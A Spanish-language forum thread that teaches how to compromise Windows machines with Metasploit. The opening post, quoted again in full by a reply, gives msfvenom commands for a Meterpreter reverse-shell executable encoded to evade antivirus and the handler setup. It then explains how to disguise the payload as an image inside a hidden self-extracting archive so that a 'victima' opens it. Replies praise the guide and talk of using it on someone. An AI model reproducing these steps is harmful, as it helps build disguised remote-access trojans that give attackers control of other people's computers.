Cómo Hackear Windows con Metasploit Framework


Alexlealxd01

HISTORIADOR Y BIÓLOGO DEL FORO
Noderador
Nodero
Noder
Hoy os enseñaré a hackear un dispositivo windows con un Metasploit

Necesitaremos lo siguiente:
  1. Kali Linux
  2. Windows
  3. Windows victima
Comencemos...

1. Crear Payload con Msfvenom

Ponemos msfvenom -p windows/meterpreter/reverse_tcp LHOST=<TU IP> LPORT=4444 -f exe > virus.exe

Paso 1.png


Una vez creado estará en nuestra carpeta personal.

Crearé un nuevo .exe encriptado por shikata_ga_nai y que evitará usar el caracter x00.

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 LHOST=<TU IP> LPORT=4444 -f exe > virus_geek.exe

Paso 1_b.png


2. Iniciar Metasploit Framework

Usaremos este comando use exploit/multi/handler

Paso 2.png


Ahora podremos estos comandos

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <TU IP>
set LPORT 4444

Paso 2_b.png


3. Preparar explotación en una imagen

Para esto usaremos nuestra imagen seleccionada y un windows (en mi caso sera el mismo que la victima vero bueno :D )

Explotación-de-Windows-con-una-imagen.png


Lo comprimimos con las siguientes características

Configuración-de-archivo-RAR.png


Aqui no ponemos C:\ ,ya que sera mas facil descubrirlo como virus asi que monemos D:\ E:\

Opciones-RAR-Avanzado-y-Autoextraíble.png


Aquí lo pondremos de tal forma que la imagen este primero, y el archivo .exe este despues

Opciones-SFX-Instalación.png


Aquí pondremos la imagen que queremos que sea un icono :D en cargar icono desde fichero
Opciones-SFX-Texto-e-Icono.png


Aquí le daremos a ocultar todo

Opciones-SFX-Modos-Ocultar-todo.png


Aquí le daremos Sobrescribir todos los ficheros para que cuando se descomprima los archivos sean mandados al directorio indicado
Opciones-SFX-Actualizar-y-Sobreescribir.png


Ahora el trabajo esta listo :D solo queda esperar a que la victima abra el archivo

4. Hacking Windows 7

Hacking-Windows-con-imagen.png


Una vez que la victima abra el archivo nos saldrá su información

Ejemplos-de-comandos-Meterpreter.png
 

KTaneR

Activo muy miembro
Burgués de Nodo
Noderador
Nodero
Noder
no lei nada, pero grandisimo post seguro, por lo menos uno sobre la tematica del foro y no de ganar dinero. Se agradece.
 

MXXGUI

Paga los ERTES primer aviso
Noderador
Nodero
Noder
Ni me lo he leido pero lo guardo para hecharle un ojo en verano cnd no me esten bombardeando a examenes y me aburra para picar a alguien.
buen aporte
 

DantrixX

𝑩𝒍𝒆𝒔𝒔𝒆𝒅 𝑩𝒐𝒚 🌌
Noderador
Nodero
Noder
Buen post, largo de hacer y hecho para situaciones excepcionales de las cuales te puedes salvar. Grande loco.
 

ABDEL HADI

Miembro muy activo
Noderador
Nodero
Noder
Hoy os enseñaré a hackear un dispositivo windows con un Metasploit

Necesitaremos lo siguiente:
  1. Kali Linux
  2. Windows
  3. Windows victima
Comencemos...

1. Crear Payload con Msfvenom

Ponemos msfvenom -p windows/meterpreter/reverse_tcp LHOST=<TU IP> LPORT=4444 -f exe > virus.exe

Ver el archivo adjunto 3977

Una vez creado estará en nuestra carpeta personal.

Crearé un nuevo .exe encriptado por shikata_ga_nai y que evitará usar el caracter x00.

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 LHOST=<TU IP> LPORT=4444 -f exe > virus_geek.exe

Ver el archivo adjunto 3978

2. Iniciar Metasploit Framework

Usaremos este comando use exploit/multi/handler

Ver el archivo adjunto 3980

Ahora podremos estos comandos

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <TU IP>
set LPORT 4444

Ver el archivo adjunto 3981

3. Preparar explotación en una imagen

Para esto usaremos nuestra imagen seleccionada y un windows (en mi caso sera el mismo que la victima vero bueno :D )

Ver el archivo adjunto 3982

Lo comprimimos con las siguientes características

Ver el archivo adjunto 3983

Aqui no ponemos C:\ ,ya que sera mas facil descubrirlo como virus asi que monemos D:\ E:\

Ver el archivo adjunto 3984

Aquí lo pondremos de tal forma que la imagen este primero, y el archivo .exe este despues

Ver el archivo adjunto 3985

Aquí pondremos la imagen que queremos que sea un icono :D en cargar icono desde fichero
Ver el archivo adjunto 3986

Aquí le daremos a ocultar todo

Ver el archivo adjunto 3987

Aquí le daremos Sobrescribir todos los ficheros para que cuando se descomprima los archivos sean mandados al directorio indicado
Ver el archivo adjunto 3988

Ahora el trabajo esta listo :D solo queda esperar a que la victima abra el archivo

4. Hacking Windows 7

Ver el archivo adjunto 3989

Una vez que la victima abra el archivo nos saldrá su información

Ver el archivo adjunto 3990
Ya lo voy a utilizar
 

DVega

Miembro muy activo
Noder
Ni me lo he leido pero lo guardo para hecharle un ojo en verano cnd no me esten bombardeando a examenes y me aburra para picar a alguien.
buen aporte
Ya somos 2, estoy haciendo una lista de cosas para el verano😂
Pero una pregunta, qué tipo de información se puede sacar al respecto?
 

s3n4k

Miembro muy activo
hola muy buenas, tengo un problema al hacerlo ya que cuando paso el archivo desde virtualvox a windows y lo abro, la consola en kali indica que sigue buscando y no encuentra el equipo, alguna solución? :(
 

Adjuntos

  • KALILINUX [Corriendo] - Oracle VM VirtualBox 30_12_2020 12_30_48 (2).png
    KALILINUX [Corriendo] - Oracle VM VirtualBox 30_12_2020 12_30_48 (2).png
    82,1 KB · Visitas: 11

Alexlealxd01

HISTORIADOR Y BIÓLOGO DEL FORO
Noderador
Nodero
Noder
hola muy buenas, tengo un problema al hacerlo ya que cuando paso el archivo desde virtualvox a windows y lo abro, la consola en kali indica que sigue buscando y no encuentra el equipo, alguna solución? :(
Mira a ver si esta en tu misma red o estan en distintas NAT